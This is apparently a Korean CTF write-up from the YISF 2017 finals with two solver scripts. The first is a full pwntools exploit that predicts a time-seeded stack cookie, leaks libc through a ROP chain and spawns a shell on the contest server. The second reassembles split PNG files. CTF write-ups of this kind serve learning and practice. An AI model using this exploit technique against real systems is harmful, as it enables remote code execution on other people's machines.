YISF 2017 본선

Pwnable/CTF

YISF 2017 본선

HSr00t 2017. 8. 13. 23:27

 pwnable custom canary challenge

 문제에서 서버시간이 한국시간이라 해서 내꺼 칼리리눅스가 한글시간이라 칼리 리눅스로 문제를 풀었다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
from ctypes import CDLL
#p=process("./echo")
p=remote("111.111.111.77",3452)
elf = ELF("./echo")
libc=CDLL("libc.so.6")
 
 
a = time.time()
libc.srand(int(a))
cookie = libc.rand()
cookie_2 = libc.rand()
print cookie
print int(a)
pop_rdi = 0x400a53
write_plt = elf.plt['write']
main = 0x400995
canary = 0x00000000006010b0
sleep(3)
print p.recvuntil("input: ")
raw_input('$')
payload = "A"*136
payload += p32(cookie)
payload += p32(cookie_2)
payload += "A"*8
payload += p64(pop_rdi)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(0x40094c)
p.sendline(payload)
 
print p.recvuntil("\n")
p.recv(1)
puts = u64(p.recv(6)+"\x00\x00")
base = puts - 0x06fd60
system = base+0x46590
BinSh = base+0x180503
print hex(puts)
print hex(base)
print hex(system)
 
 
a=time.time()
libc.srand(int(a))
cookie = libc.rand()
cookie_2 = libc.rand()
print hex(cookie)
print hex(cookie_2)
print p.recvuntil('input: ')
payload = "A"*136
payload += p32(cookie)
payload += p32(cookie_2)
payload += "Q"*8
payload += p64(pop_rdi)
payload += p64(BinSh)
payload += p64(system)
p.sendline(payload)
p.interactive()
cs

-MISC-

hex들을 합쳐서 이미지를 만들고 얇은이미지끼리 하나하나 합치는 문제였다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from os import system
 
i = 1
 
while(1):
    if(i>=755):
        break
    png_1 = open(str(i)+"/"+"1","rb")
    png_1_read = png_1.read().encode("hex")
    png_1.close()
    
    png_2 = open(str(i)+"/"+"2","rb")
    png_2_read = png_2.read().encode("hex")
    png_2.close()
    
    png_3 = open(str(i)+"/"+"3","rb")
    png_3_read = png_3.read().encode("hex")
    png_3.close()
 
    if(png_1_read[0:8]=="89504e47"):
            header = "1"
    elif(png_2_read[0:8]=="89504e47"):
            header = "2"
    else:
            header = "3"
    if(png_1_read[-16:]=="49454e44ae426082"):
            last = "1"
    elif(png_2_read[-16:]=="49454e44ae426082"):
            last = "2"
    else:
            last = "3"
    if(header == "1" and last == "2"):
            senter = "3"
    elif(header=="2" and last=="1"):
            senter="3"
    elif(header=="3" and last=="1"):
            senter="2"
    elif(header=="1" and last=="3"):
               senter="2"
    elif(header=="2" and last=="3"):
            senter="1"
    else:
            senter="1"
 
    last = open(str(i)+"/"+str(last),"rb") #last png
    last_read = last.read()
    last.close() 
    sent = open(str(i)+"/"+str(senter),"ab") 
    sent.write(last_read)
    sent.close()
    
    senter = open(str(i)+"/"+str(senter),"rb")
    senter_read = senter.read()
    senter.close()
    
    head = open(str(i)+"/"+str(header),"ab")
    head.write(senter_read)
    head.close()
 
    system('mv'+" "+str(i)+'/'+str(header)+" "+str(i)+'/'+'header.png')
    i+=1
 
 
for i in range(1,790):
    system("cp"+" "+str(i)+"/"+"header.png"+" "+"IMG/header"+str(i)+".png")
 
 
Colored by Color Scripter
cs